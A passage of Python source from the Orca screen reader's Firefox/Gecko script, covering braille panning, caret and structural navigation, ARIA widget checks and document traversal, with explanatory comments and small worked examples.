if self.flatReviewContext \
or self.isAriaWidget(orca_state.locusOfFocus) \
or not self.inDocumentContent() \
or not self.isBrailleBeginningShowing():
default.Script.panBrailleLeft(self, inputEvent, panAmount)
else:
self.goPreviousLine(inputEvent)
while self.panBrailleInDirection(panToLeft=False):
pass
self.refreshBraille(False)
return True
def panBrailleRight(self, inputEvent=None, panAmount=0):
"""In document content, we want to use the panning keys to browse the
entire document.
"""
if self.flatReviewContext \
or self.isAriaWidget(orca_state.locusOfFocus) \
or not self.inDocumentContent() \
or not self.isBrailleEndShowing():
default.Script.panBrailleRight(self, inputEvent, panAmount)
elif self.goNextLine(inputEvent):
while self.panBrailleInDirection(panToLeft=True):
pass
self.refreshBraille(False)
return True
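# Together, panBrailleLeft and panBrailleRight let the braille panning keys
# walk the whole document: once the display already shows the beginning (or
# end) of the current line, the next pan moves to the previous (or next) line
# and pans to its far edge.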
####################################################################
# #
# Utility Methods #
# #
####################################################################
def inDocumentContent(self, obj=None):
"""Returns True if the given object (defaults to the current
locus of focus is in the document content).
"""
if not obj:
obj = orca_state.locusOfFocus
try:
return self.generatorCache['inDocumentContent'][obj]
except:
pass
result = False
while obj:
role = obj.getRole()
if role == pyatspi.ROLE_DOCUMENT_FRAME \
or role == pyatspi.ROLE_EMBEDDED:
result = True
break
else:
obj = obj.parent
if 'inDocumentContent' not in self.generatorCache:
self.generatorCache['inDocumentContent'] = {}
if obj:
self.generatorCache['inDocumentContent'][obj] = result
return result
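# Example: for an object inside a web page, the ancestry walk above reaches a
# ROLE_DOCUMENT_FRAME (or ROLE_EMBEDDED) and returns True; for a toolbar
# widget the walk runs out of parents without finding one and returns False.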
def useCaretNavigationModel(self, keyboardEvent):
"""Returns True if we should do our own caret navigation.
"""
if not script_settings.controlCaretNavigation:
return False
if not self.inDocumentContent():
return False
if not self.isNavigableAria(orca_state.locusOfFocus):
return False
if keyboardEvent.event_string in ["Page_Up", "Page_Down"]:
return False
if keyboardEvent.modifiers & settings.SHIFT_MODIFIER_MASK:
return False
if self._loadingDocumentContent:
return False
if not orca_state.locusOfFocus:
return False
weHandleIt = True
obj = orca_state.locusOfFocus
role = obj.getRole()
if self.utilities.isEntry(obj):
text = obj.queryText()
length = text.characterCount
caretOffset = text.caretOffset
singleLine = obj.getState().contains(
pyatspi.STATE_SINGLE_LINE)
# Single line entries have an additional newline character
# at the end.
#
newLineAdjustment = int(not singleLine)
# Home and End should not be overridden if we're in an
# entry.
#
if keyboardEvent.event_string in ["Home", "End"]:
return False
# We want to use our caret navigation model in an entry if
# there's nothing in the entry, we're at the beginning of
# the entry and press Left or Up, or we're at the end of the
# entry and press Right or Down.
#
if length == 0 \
or ((length == 1) and (text.getText(0, -1) == "\n")):
weHandleIt = True
elif caretOffset <= 0:
weHandleIt = keyboardEvent.event_string \
in ["Up", "Left"]
elif caretOffset >= length - newLineAdjustment \
and not self._autocompleteVisible:
weHandleIt = keyboardEvent.event_string \
in ["Down", "Right"]
else:
weHandleIt = False
if singleLine and not weHandleIt \
and not self._autocompleteVisible:
weHandleIt = keyboardEvent.event_string in ["Up", "Down"]
elif keyboardEvent.modifiers & settings.ALT_MODIFIER_MASK:
# Alt+Down Arrow is the Firefox command to expand/collapse the
# *currently focused* combo box. When Orca is controlling the
# caret, it is possible to navigate into a combo box *without
# giving focus to that combo box*. Under these circumstances,
# the menu item has focus. Because the user knows that he/she
# is on a combo box, he/she expects to be able to use Alt+Down
# Arrow to expand the combo box. Therefore, if a menu item has
# focus and Alt+Down Arrow is pressed, we will handle it by
# giving the combo box focus and expanding it as the user
# expects. We also want to avoid grabbing focus on a combo box.
# Therefore, if the caret is immediately before a combo box,
# we'll handle it the same way.
#
if keyboardEvent.event_string == "Down":
[obj, offset] = self.getCaretContext()
index = self.getChildIndex(obj, offset)
if index >= 0:
weHandleIt = \
obj[index].getRole() == pyatspi.ROLE_COMBO_BOX
if not weHandleIt:
weHandleIt = role == pyatspi.ROLE_MENU_ITEM
elif role in [pyatspi.ROLE_COMBO_BOX, pyatspi.ROLE_MENU_ITEM]:
weHandleIt = keyboardEvent.event_string in ["Left", "Right"]
elif role == pyatspi.ROLE_LIST_ITEM:
weHandleIt = not obj.getState().contains(pyatspi.STATE_FOCUSED)
elif role == pyatspi.ROLE_LIST:
weHandleIt = not obj.getState().contains(pyatspi.STATE_FOCUSABLE)
return weHandleIt
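# A minimal sketch (hypothetical values, not from the original
# source) of the end-of-entry check above. Per the code, the
# adjustment is 1 whenever the entry is not single-line:
#
#   length = 6                                # text is "hello\n"
#   singleLine = False
#   newLineAdjustment = int(not singleLine)   # == 1
#   caretOffset = 5                           # on the trailing newline
#
#   caretOffset >= length - newLineAdjustment # 5 >= 5, so pressing
#   Down or Right hands control to Orca's own caret navigation.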
def useStructuralNavigationModel(self):
"""Returns True if we should do our own structural navigation.
This should return False if we're in something like an entry
or a list.
"""
letThemDoItEditableRoles = [pyatspi.ROLE_ENTRY,
pyatspi.ROLE_TEXT,
pyatspi.ROLE_PASSWORD_TEXT]
letThemDoItSelectionRoles = [pyatspi.ROLE_LIST,
pyatspi.ROLE_LIST_ITEM,
pyatspi.ROLE_MENU_ITEM]
if not self.structuralNavigation.enabled:
return False
if not self.isNavigableAria(orca_state.locusOfFocus):
return False
if self._loadingDocumentContent:
return False
# If the Orca_Modifier key was pressed, we're handling it.
#
if isinstance(orca_state.lastInputEvent, input_event.KeyboardEvent):
mods = orca_state.lastInputEvent.modifiers
isOrcaKey = mods & settings.ORCA_MODIFIER_MASK
if isOrcaKey:
return True
obj = orca_state.locusOfFocus
while obj:
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
# Don't use the structural navigation model if the
# user is editing the document.
return not obj.getState().contains(pyatspi.STATE_EDITABLE)
elif obj.getRole() in letThemDoItEditableRoles:
return not obj.getState().contains(pyatspi.STATE_EDITABLE)
elif obj.getRole() in letThemDoItSelectionRoles:
return not obj.getState().contains(pyatspi.STATE_FOCUSED)
elif obj.getRole() == pyatspi.ROLE_COMBO_BOX:
return False
else:
obj = obj.parent
return False
def isNavigableAria(self, obj):
"""Returns True if the object being examined is an ARIA widget where
we want to provide Orca keyboard navigation. Returning False
indicates that we want Firefox to handle key commands.
"""
try:
state = obj.getState()
except (LookupError, RuntimeError):
debug.println(debug.LEVEL_SEVERE,
"isNavigableAria() - obj no longer exists")
return True
except:
pass
else:
# If the current object isn't even showing, we don't want to hand
# this off to Firefox's native caret navigation because who knows
# where we'll wind up....
#
if not state.contains(pyatspi.STATE_SHOWING):
return True
# Sometimes the child of an ARIA widget claims focus. It may lack
# the attributes we're looking for. Therefore, if obj is not an
# ARIA widget, we'll also consider the parent's attributes.
#
attrs = self._getAttrDictionary(obj)
if obj and not self.isAriaWidget(obj):
attrs.update(self._getAttrDictionary(obj.parent))
try:
# ARIA landmark widgets
if set(attrs['xml-roles'].split()).intersection(\
set(settings.ariaLandmarks)):
return True
# ARIA live region
elif 'container-live' in attrs:
return True
# Don't treat links as ARIA widgets. And we should be able to
# escape/exit ARIA entries just like we do HTML entries (How
# is the user supposed to know which he/she happens to be in?)
#
elif obj.getRole() in [pyatspi.ROLE_ENTRY,
pyatspi.ROLE_LINK,
pyatspi.ROLE_ALERT,
pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_SECTION]:
return obj.parent.getRole() not in [pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_PAGE_TAB]
# All other ARIA widgets we will assume are navigable if
# they are not focused.
#
else:
return not obj.getState().contains(pyatspi.STATE_FOCUSABLE)
except (KeyError, TypeError):
return True
def isAriaWidget(self, obj=None):
"""Returns True if the object being examined is an ARIA widget.
Arguments:
- obj: The accessible object of interest. If None, the
locusOfFocus is examined.
"""
try:
return self.generatorCache['isAria'][obj]
except:
pass
obj = obj or orca_state.locusOfFocus
# TODO - JD: It seems insufficient to take a "if it's ARIA, use
# the default script" approach. For instance, an ARIA dialog does
# not have "unrelated labels"; it has embedded object characters
# just like other Gecko content. Unless and until Gecko exposes
# ARIA widgets as proper widgets, we'll need to not be so trusting.
# For now, just add hacks on a per-case basis until there is time
# to properly review this code.
try:
role = obj.getRole()
except:
pass
else:
if role in [pyatspi.ROLE_DIALOG, pyatspi.ROLE_ALERT]:
return False
attrs = self._getAttrDictionary(obj)
if 'isAria' not in self.generatorCache:
self.generatorCache['isAria'] = {}
self.generatorCache['isAria'][obj] = \
('xml-roles' in attrs and 'live' not in attrs)
return self.generatorCache['isAria'][obj]
def _getAttrDictionary(self, obj):
if not obj:
return {}
try:
return dict([attr.split(':', 1) for attr in obj.getAttributes()])
except:
return {}
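# A minimal sketch (hypothetical attribute strings) of what
# _getAttrDictionary() produces. AT-SPI exposes object attributes
# as "name:value" strings, and the method splits each on the
# first colon only:
#
#   obj.getAttributes()          -> ["xml-roles:banner", "tag:DIV"]
#   self._getAttrDictionary(obj) -> {"xml-roles": "banner",
#                                    "tag": "DIV"}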
def handleAsLiveRegion(self, event):
"""Returns True if the given event (object:children-changed, object:
text-insert only) should be considered a live region event"""
if self._loadingDocumentContent \
or not _settingsManager.getSetting('inferLiveRegions'):
return False
attrs = self._getAttrDictionary(event.source)
if 'container-live' in attrs:
return True
return False
def getChildIndex(self, obj, characterOffset):
"""Given an object that implements accessible text, determine
the index of the child that is represented by an
EMBEDDED_OBJECT_CHARACTER at characterOffset in the object's
accessible text."""
try:
hypertext = obj.queryHypertext()
except NotImplementedError:
index = -1
else:
index = hypertext.getLinkIndex(characterOffset)
return index
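# A minimal sketch (hypothetical offsets): if a paragraph's
# accessible text is "See X for details", where X stands for the
# EMBEDDED_OBJECT_CHARACTER of a child link, then
# getChildIndex(paragraph, 4) asks the hypertext interface for the
# link at offset 4 and returns that child's index; an offset over
# plain text yields -1, as does an object with no hypertext.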
def getExtents(self, obj, startOffset, endOffset):
"""Returns [x, y, width, height] of the text at the given offsets
if the object implements accessible text, or just the extents of
the object if it doesn't implement accessible text.
"""
if not obj:
return [0, 0, 0, 0]
# The menu items that are children of combo boxes have unique
# extents based on their physical position, even though they are
# not showing. Therefore, if the object in question is a menu
# item, get the object extents rather than the range extents for
# the text. Similarly, if it's a menu in a combo box, get the
# extents of the combo box.
#
text = self.utilities.queryNonEmptyText(obj)
if text and obj.getRole() != pyatspi.ROLE_MENU_ITEM:
extents = text.getRangeExtents(startOffset, endOffset, 0)
elif obj.getRole() == pyatspi.ROLE_MENU \
and obj.parent.getRole() == pyatspi.ROLE_COMBO_BOX:
ext = obj.parent.queryComponent().getExtents(0)
extents = [ext.x, ext.y, ext.width, ext.height]
else:
ext = obj.queryComponent().getExtents(0)
extents = [ext.x, ext.y, ext.width, ext.height]
return extents
def onSameLine(self, a, b, pixelDelta=5):
"""Determine if extents a and b are on the same line.
Arguments:
-a: [x, y, width, height]
-b: [x, y, width, height]
Returns True if a and b are on the same line.
"""
# If a and b are identical, by definition they are on the same line.
#
if a == b:
return True
# For now, we'll just take a look at the bottom of the area.
# The code after this takes the whole extents into account,
# but that logic has issues in the case where we have
# something very tall next to lots of shorter lines (e.g., an
# image with lots of text to the left or right of it). The
# number 11 here represents something that seems to work well
# with superscripts and subscripts on a line as well as pages
# with smaller fonts on them, such as Craigslist.
#
if abs(a[1] - b[1]) > 11:
return False
# If there's an overlap of 1 pixel or less, they are on different
# lines. Keep in mind "lowest" and "highest" mean visually on the
# screen, but that the value is the y coordinate.
#
highestBottom = min(a[1] + a[3], b[1] + b[3])
lowestTop = max(a[1], b[1])
if lowestTop >= highestBottom - 1:
return False
return True
# If we do overlap, lets see how much. We'll require a 25% overlap
# for now...
#
#if lowestTop < highestBottom:
# overlapAmount = highestBottom - lowestTop
# shortestHeight = min(a[3], b[3])
# return ((1.0 * overlapAmount) / shortestHeight) > 0.25
#else:
# return False
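# Worked example (hypothetical extents) for onSameLine():
#
#   a = [10, 100, 50, 20]   # bottom edge at y = 120
#   b = [70, 104, 40, 18]   # bottom edge at y = 122
#
#   abs(a[1] - b[1]) == 4, which is within the 11-pixel tolerance.
#   highestBottom = min(120, 122) == 120
#   lowestTop = max(100, 104) == 104
#   120 - 104 == 16 pixels of vertical overlap (more than 1), so
#   a and b are treated as being on the same line.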
def isLabellingContents(self, obj, contents):
"""Given and obj and a list of [obj, startOffset, endOffset] tuples,
determine if obj is labelling anything in the tuples.
Returns the object being labelled, or None.
"""
if obj.getRole() != pyatspi.ROLE_LABEL:
return None
relationSet = obj.getRelationSet()
if not relationSet:
return None
for relation in relationSet:
if relation.getRelationType() \
== pyatspi.RELATION_LABEL_FOR:
for i in range(0, relation.getNTargets()):
target = relation.getTarget(i)
for content in contents:
if content[0] == target:
return target
return None
def getAutocompleteEntry(self, obj):
"""Returns the ROLE_ENTRY object of a ROLE_AUTOCOMPLETE object or
None if the entry cannot be found.
"""
for child in obj:
if child and (child.getRole() == pyatspi.ROLE_ENTRY):
return child
return None
def getCellCoordinates(self, obj):
"""Returns the [row, col] of a ROLE_TABLE_CELL or [0, 0]
if the coordinates cannot be found.
"""
if obj.getRole() != pyatspi.ROLE_TABLE_CELL:
obj = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_TABLE_CELL], [pyatspi.ROLE_DOCUMENT_FRAME])
parentTable = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_TABLE], [pyatspi.ROLE_DOCUMENT_FRAME])
try:
table = parentTable.queryTable()
except:
pass
else:
index = self.utilities.cellIndex(obj)
row = table.getRowAtIndex(index)
col = table.getColumnAtIndex(index)
return [row, col]
return [0, 0]
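# A minimal sketch (hypothetical 2x3 table): the cell at flattened
# index 4 maps to table.getRowAtIndex(4) == 1 and
# table.getColumnAtIndex(4) == 1, so getCellCoordinates() returns
# [1, 1]; if no enclosing table can be queried, it returns [0, 0].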
def isBlankCell(self, obj):
"""Returns True if the table cell is empty or consists of a single
non-breaking space.
Arguments:
- obj: the table cell to examine
"""
text = self.utilities.displayedText(obj)
if text and text != '\u00A0':
return False
else:
for child in obj:
if child.getRole() == pyatspi.ROLE_LINK:
return False
return True
def isFormField(self, obj):
"""Returns True if the given object is a field inside of a form."""
if not obj or not self.inDocumentContent(obj):
return False
formRoles = [pyatspi.ROLE_CHECK_BOX,
pyatspi.ROLE_RADIO_BUTTON,
pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_DOCUMENT_FRAME,
pyatspi.ROLE_LIST,
pyatspi.ROLE_ENTRY,
pyatspi.ROLE_PASSWORD_TEXT,
pyatspi.ROLE_PUSH_BUTTON]
state = obj.getState()
isField = obj.getRole() in formRoles \
and state.contains(pyatspi.STATE_FOCUSABLE) \
and state.contains(pyatspi.STATE_SENSITIVE)
if obj.getRole() == pyatspi.ROLE_DOCUMENT_FRAME:
isField = isField and state.contains(pyatspi.STATE_EDITABLE)
return isField
def isUselessObject(self, obj):
"""Returns true if the given object is an obj that doesn't
have any meaning associated with it and it is not inside a
link."""
if not obj:
return True
useless = False
textObj = self.utilities.queryNonEmptyText(obj)
if not textObj and obj.getRole() == pyatspi.ROLE_PARAGRAPH:
# Under these circumstances, this object is useless even
# if it is the child of a link.
#
return True
elif obj.getRole() in [pyatspi.ROLE_IMAGE, \
pyatspi.ROLE_TABLE_CELL, \
pyatspi.ROLE_SECTION]:
text = self.utilities.displayedText(obj)
if (not text) or (len(text) == 0):
text = self.utilities.displayedLabel(obj)
if (not text) or (len(text) == 0):
useless = True
if useless:
link = self.utilities.ancestorWithRole(
obj, [pyatspi.ROLE_LINK], [pyatspi.ROLE_DOCUMENT_FRAME])
if link:
if obj.getRole() == pyatspi.ROLE_IMAGE:
# If this object had alternative text and/or a title,
# we wouldn't be here. We need to determine if this
# image is indeed worth presenting and not a duplicate
# piece of information. See Facebook's timeline and/or
# bug 584540.
#
for child in obj.parent:
if self.utilities.displayedText(child):
# Some other sibling is presenting information.
# We'll treat this image as useless.
#
break
else:
# No other siblings are presenting information.
#
if obj.parent.getRole() == pyatspi.ROLE_LINK:
if not link.name:
# If no siblings are presenting information,
# but the link had a name, then we'd know we
# had text along with the image(s). Given the
# lack of name, we'll treat the first image as
# the useful one and ignore the rest.
#
useless = obj.getIndexInParent() > 0
else:
# The image must be in a paragraph or section or
# heading or something else that might result in
# it being on its own line.
#
textObj = \
self.utilities.queryNonEmptyText(obj.parent)
if textObj:
text = textObj.getText(0, -1)
text = text.replace(\
self.EMBEDDED_OBJECT_CHARACTER, "").strip()
if not text:
# There's no other text on this line inside
# of this link. We don't want to skip over
# this line, so we'll treat the first image
# as useful.
#
useless = obj.getIndexInParent() > 0
else:
useless = False
return useless
def pursueForFlatReview(self, obj):
"""Determines if we should look any further at the object
for flat review."""
# It should be enough to check for STATE_SHOWING, but Gecko seems
# to reverse STATE_SHOWING and STATE_VISIBLE, exposing STATE_SHOWING
# for objects which are offscreen. So, we'll check for both. See
# bug #542833. [[[TODO - JD: We're putting this check in just this
# script for now to be on the safe side. Consider for the default
# script as well?]]]
#
try:
state = obj.getState()
except:
return False
else:
return state.contains(pyatspi.STATE_SHOWING) \
and state.contains(pyatspi.STATE_VISIBLE)
def getHeadingLevel(self, obj):
"""Determines the heading level of the given object. A value
of 0 means there is no heading level."""
level = 0
if obj is None:
return level
if obj.getRole() == pyatspi.ROLE_HEADING:
attributes = obj.getAttributes()
if attributes is None:
return level
for attribute in attributes:
if attribute.startswith("level:"):
level = int(attribute.split(":")[1])
break
return level
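# A minimal sketch (hypothetical attributes): an <h2>-style heading
# typically exposes something like ["level:2", "tag:H2"], so the
# loop above finds "level:2" and returns 2. Objects that are not
# headings, or that lack a "level:" attribute, yield 0.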
def getTopOfFile(self):
"""Returns the object and first caret offset at the top of the
document frame."""
documentFrame = self.utilities.documentFrame()
[obj, offset] = self.findFirstCaretContext(documentFrame, 0)
return [obj, offset]
def getBottomOfFile(self):
"""Returns the object and last caret offset at the bottom of the
document frame."""
documentFrame = self.utilities.documentFrame()
text = self.utilities.queryNonEmptyText(documentFrame)
if text:
char = text.getText(text.characterCount - 1, text.characterCount)
if char != self.EMBEDDED_OBJECT_CHARACTER:
return [documentFrame, text.characterCount - 1]
obj = self.getLastObject(documentFrame)
offset = 0
# If the last object is a link, it may be more efficient to check
# for text that follows.
#
if obj and obj.getRole() == pyatspi.ROLE_LINK:
text = self.utilities.queryNonEmptyText(obj.parent)
if text:
char = text.getText(text.characterCount - 1,
text.characterCount)
if char != self.EMBEDDED_OBJECT_CHARACTER:
return [obj.parent, text.characterCount - 1]
# obj should now be the very last item in the entire document frame
# and not have children of its own. Therefore, it should have text.
# If it doesn't, we don't want to be here.
#
text = self.utilities.queryNonEmptyText(obj)
if text:
offset = text.characterCount - 1
else:
obj = self.findPreviousObject(obj, documentFrame)
while obj:
[lastObj, lastOffset] = self.findNextCaretInOrder(obj, offset)
if not lastObj \
or (self.utilities.isSameObject(lastObj, obj) \
and lastOffset == offset):
break
[obj, offset] = [lastObj, lastOffset]
return [obj, offset]
def getLastObject(self, documentFrame):
"""Returns the last object in the document frame"""
try:
lastChild = documentFrame[documentFrame.childCount - 1]
except:
lastChild = documentFrame
while lastChild:
lastObj = self.findNextObject(lastChild, documentFrame)
if lastObj and lastObj != lastChild:
lastChild = lastObj
else:
break
return lastChild
def getMeaningfulObjectsFromLine(self, line):
"""Attempts to strip a list of (obj, start, end) tuples into one
that contains only meaningful objects."""
if not line or not len(line):
return []
lineContents = []
for item in line:
role = item[0].getRole()
# If it's labelling something on this line, don't move to
# it.
#
if role == pyatspi.ROLE_LABEL \
and self.isLabellingContents(item[0], line):
continue
# Rather than do a brute force label infer, we'll focus on
# entries as they are the most common and their label is
# likely on this line. The functional label may be made up
# of several objects, so we'll examine the strings of what
# we've got and pop off the ones that match.
#
elif self.utilities.isEntry(item[0]):
label = \
self.labelInference.inferFromTextLeft(item[0]) \
or self.labelInference.inferFromTextRight(item[0])
index = len(lineContents) - 1
while label and index >= 0:
prevItem = lineContents[index]
prevText = self.utilities.queryNonEmptyText(prevItem[0])
if prevText:
string = prevText.getText(prevItem[1], prevItem[2])
if label.endswith(string):
lineContents.pop()
length = len(label) - len(string)
label = label[0:length]
else:
break
index -= 1
else:
text = self.utilities.queryNonEmptyText(item[0])
if text:
string = text.getText(item[1], item[2])
if not len(string.strip()):
continue
lineContents.append(item)
return lineContents
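# A minimal sketch (hypothetical strings) of the label-popping loop
# above: if an entry's inferred label is "First name:" and the two
# preceding items on the line render as "First " and "name:", the
# loop pops "name:" (leaving label == "First ") and then "First "
# (leaving label == ""), so the entry is kept without a duplicate
# textual label beside it.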
def getPageSummary(self, obj):
"""Returns the quantity of headings, forms, tables, visited links,
and unvisited links on the page containing obj.
"""
docframe = self.utilities.documentFrame()
col = docframe.queryCollection()
headings = 0
forms = 0
tables = 0
vlinks = 0
uvlinks = 0
percentRead = None
stateset = pyatspi.StateSet()
roles = [pyatspi.ROLE_HEADING, pyatspi.ROLE_LINK, pyatspi.ROLE_TABLE,
pyatspi.ROLE_FORM]
rule = col.createMatchRule(stateset.raw(), col.MATCH_NONE,
"", col.MATCH_NONE,
roles, col.MATCH_ANY,
"", col.MATCH_NONE,
False)
matches = col.getMatches(rule, col.SORT_ORDER_CANONICAL, 0, True)
col.freeMatchRule(rule)
for obj in matches:
role = obj.getRole()
if role == pyatspi.ROLE_HEADING:
headings += 1
elif role == pyatspi.ROLE_FORM:
forms += 1
elif role == pyatspi.ROLE_TABLE \
and not self.utilities.isLayoutOnly(obj):
tables += 1
elif role == pyatspi.ROLE_LINK:
if obj.getState().contains(pyatspi.STATE_VISITED):
vlinks += 1
else:
uvlinks += 1
return [headings, forms, tables, vlinks, uvlinks, percentRead]
####################################################################
# #
# Methods to find previous and next objects. #
# #
####################################################################
def findFirstCaretContext(self, obj, characterOffset):
"""Given an object and a character offset, find the first
[obj, characterOffset] that is actually presenting something
on the display. The reason we do this is that the
[obj, characterOffset] passed in may actually be pointing
to an embedded object character. In those cases, we dig
into the hierarchy to find the 'real' thing.
Arguments:
-obj: an accessible object
-characterOffset: the offset of the character where to start
looking for real text
Returns [obj, characterOffset] that points to real content.
"""
try:
role = obj.getRole()
except:
return [None, -1]
if role == pyatspi.ROLE_TABLE and obj.childCount:
child = obj[0]
if child.getRole() in [pyatspi.ROLE_CAPTION, pyatspi.ROLE_LIST]:
obj = child
else:
obj = obj.queryTable().getAccessibleAt(0, 0)
return self.findFirstCaretContext(obj, 0)
text = self.utilities.queryNonEmptyText(obj)
if not text:
return [obj, -1]
if role == pyatspi.ROLE_LIST_ITEM and not characterOffset and obj.name:
words = obj.name.split()
characterOffset = len(words[0])
character = text.getText(characterOffset, characterOffset + 1)
if len(character) == 1 and character != self.EMBEDDED_OBJECT_CHARACTER:
return [obj, characterOffset]
try:
childIndex = self.getChildIndex(obj, characterOffset)
child = obj[childIndex]
# Handle bogus empty paragraphs. Bug 677615.
# Make that bogus empty text objects.
textRoles = [pyatspi.ROLE_HEADING,
pyatspi.ROLE_PARAGRAPH,
pyatspi.ROLE_SECTION]
if child.getRole() in textRoles \
and not self.utilities.queryNonEmptyText(child):
return self.findFirstCaretContext(obj, characterOffset + 1)
return self.findFirstCaretContext(child, 0)
except:
return [obj, -1]
return [obj, characterOffset]
def findNextCaretInOrder(self, obj=None,
startOffset=-1,
includeNonText=True):
"""Given an object at a character offset, return the next
caret context following an in-order traversal rule.
Arguments:
- obj: the Accessible to start at. If None, starts at the
document frame.
- startOffset: character position in the object text field
(if it exists) to start at. Defaults to -1, which means
start at the beginning - that is, the next character is the
first character in the object.
- includeNonText: If False, only land on objects that support the
accessible text interface; otherwise, include logical leaf
nodes like check boxes, combo boxes, etc.
Returns [obj, characterOffset] or [None, -1]
"""
if not obj:
obj = self.utilities.documentFrame()
if not obj or not self.inDocumentContent(obj):
return [None, -1]
if obj.getRole() == pyatspi.ROLE_INVALID:
debug.println(debug.LEVEL_SEVERE, \
"findNextCaretInOrder: object is invalid")
return [None, -1]
# We do not want to descend objects of certain role types.
#
doNotDescend = obj.getState().contains(pyatspi.STATE_FOCUSABLE) \
and obj.getRole() in [pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_LIST]
text = self.utilities.queryNonEmptyText(obj)
if text:
unicodeText = self.utilities.unicodeText(obj)
# Delete the final space character if we find it. Otherwise,
# we'll arrow to it. (We can't just strip the string otherwise
# we skip over blank lines that one could otherwise arrow to.)
#
if len(unicodeText) > 1 and unicodeText[-1] == " ":
unicodeText = unicodeText[0:len(unicodeText) - 1]
nextOffset = startOffset + 1
while 0 <= nextOffset < len(unicodeText):
if unicodeText[nextOffset] != self.EMBEDDED_OBJECT_CHARACTER:
return [obj, nextOffset]
elif obj.childCount:
try:
child = obj[self.getChildIndex(obj, nextOffset)]
except:
break
if child:
return self.findNextCaretInOrder(child,
-1,
includeNonText)
else:
nextOffset += 1
else:
nextOffset += 1
# If this is a list or combo box in an HTML form, we don't want
# to place the caret inside the list, but rather treat the list
# as a single object. Otherwise, if it has children, look there.
#
elif obj.childCount and obj[0] and not doNotDescend:
try:
return self.findNextCaretInOrder(obj[0],
-1,
includeNonText)
except:
pass
elif includeNonText and (startOffset < 0):
extents = obj.queryComponent().getExtents(0)
if (extents.width != 0) and (extents.height != 0):
return [obj, 0]
# If we're here, we need to start looking up the tree,
# going no higher than the document frame, of course.
#
documentFrame = self.utilities.documentFrame()
if self.utilities.isSameObject(obj, documentFrame):
return [None, -1]
while obj.parent and obj != obj.parent:
characterOffsetInParent = \
self.utilities.characterOffsetInParent(obj)
if characterOffsetInParent >= 0:
return self.findNextCaretInOrder(obj.parent,
characterOffsetInParent,
includeNonText)
else:
index = obj.getIndexInParent() + 1
if index < obj.parent.childCount:
try:
return self.findNextCaretInOrder(
obj.parent[index],
-1,
includeNonText)
except:
pass
obj = obj.parent
return [None, -1]
def findPreviousCaretInOrder(self,
obj=None,
startOffset=-1,
includeNonText=True):
"""Given an object an a character offset, return the previous
caret context following an in order traversal rule.
Arguments:
- obj: the Accessible to start at. If None, starts at the
document frame.
- startOffset: character position in the object text field
(if it exists) to start at. Defaults to -1, which means
start at the end - that is, the previous character is the
last character of the object.
Returns [obj, characterOffset] or [None, -1]
"""
if not obj:
obj = self.utilities.documentFrame()
if not obj or not self.inDocumentContent(obj):
return [None, -1]
if obj.getRole() == pyatspi.ROLE_INVALID:
debug.println(debug.LEVEL_SEVERE, \
"findPreviousCaretInOrder: object is invalid")
return [None, -1]
# We do not want to descend objects of certain role types.
#
doNotDescend = obj.getState().contains(pyatspi.STATE_FOCUSABLE) \
and obj.getRole() in [pyatspi.ROLE_COMBO_BOX,
pyatspi.ROLE_LIST]
text = self.utilities.queryNonEmptyText(obj)
if text:
unicodeText = self.utilities.unicodeText(obj)
# Delete the final space character if we find it. Otherwise,
# we'll arrow to it. (We can't just strip the string otherwise
# we skip over blank lines that one could otherwise arrow to.)
#
if len(unicodeText) > 1 and unicodeText[-1] == " ":
unicodeText = unicodeText[0:len(unicodeText) - 1]
if (startOffset == -1) or (startOffset > len(unicodeText)):
startOffset = len(unicodeText)
previousOffset = startOffset - 1
while previousOffset >= 0:
if unicodeText[previousOffset] \
!= self.EMBEDDED_OBJECT_CHARACTER:
return [obj, previousOffset]
elif obj.childCount:
child = obj[self.getChildIndex(obj, previousOffset)]
if child:
return self.findPreviousCaretInOrder(child,
-1,
includeNonText)
else:
previousOffset -= 1
else:
previousOffset -= 1
# If this is a list or combo box in an HTML form, we don't want
# to place the caret inside the list, but rather treat the list
# as a single object. Otherwise, if it has children, look there.
#
elif obj.childCount and obj[obj.childCount - 1] and not doNotDescend:
try:
return self.findPreviousCaretInOrder(
obj[obj.childCount - 1],
-1,
includeNonText)
except:
pass
elif includeNonText and (startOffset < 0):
extents = obj.queryComponent().getExtents(0)
if (extents.width != 0) and (extents.height != 0):
return [obj, 0]
# If we're here, we need to start looking up the tree,
# going no higher than the document frame, of course.
#
documentFrame = self.utilities.documentFrame()
if self.utilities.isSameObject(obj, documentFrame):
return [None, -1]
while obj.parent and obj != obj.parent:
characterOffsetInParent = \
self.utilities.characterOffsetInParent(obj)
if characterOffsetInParent >= 0:
return self.findPreviousCaretInOrder(obj.parent,
characterOffsetInParent,
includeNonText)
else:
index = obj.getIndexInParent() - 1
if index >= 0:
try:
return self.findPreviousCaretInOrder(
obj.parent[index],
-1,
includeNonText)
except:
pass
obj = obj.parent
return [None, -1]
def findPreviousObject(self, obj, documentFrame):
"""Finds the object prior to this one, where the tree we're
dealing with is a DOM and 'prior' means the previous object
in a linear presentation sense.
Arguments:
-obj: the object where to start.
"""
previousObj = None
characterOffset = 0
# If the object is the document frame, the previous object is
# the one that follows us relative to our offset.
#
if self.utilities.isSameObject(obj, documentFrame):
[obj, characterOffset] = self.getCaretContext()
if not obj:
return None
index = obj.getIndexInParent() - 1
if (index < 0):
if not self.utilities.isSameObject(obj, documentFrame):
previousObj = obj.parent
else:
# We're likely at the very end of the document
# frame.
previousObj = self.getLastObject(documentFrame)
else:
# [[[TODO: HACK - WDW defensive programming because Gecko
# a11y hierarchies are not always working. Objects say
# they have children, but these children don't exist when
# we go to get them. So...we'll just keep going backwards
# until we find a real child that we can work with.]]]
#
while not isinstance(previousObj,
pyatspi.Accessibility.Accessible) \
and index >= 0:
previousObj = obj.parent[index]
index -= 1
# Now that we're at a child we can work with, we need to
# look at it further. It could be the root of a hierarchy.
# In that case, the last child in this hierarchy is what
# we want. So, we dive down the 'right hand side' of the
# tree to get there.
#
# [[[TODO: HACK - WDW we need to be defensive because of
# Gecko's broken a11y hierarchies, so we make this much
# more complex than it really has to be.]]]
#
if not previousObj:
if not self.utilities.isSameObject(obj, documentFrame):
previousObj = obj.parent
else:
previousObj = obj
role = previousObj.getRole()
if role == pyatspi.ROLE_MENU_ITEM:
return previousObj.parent.parent
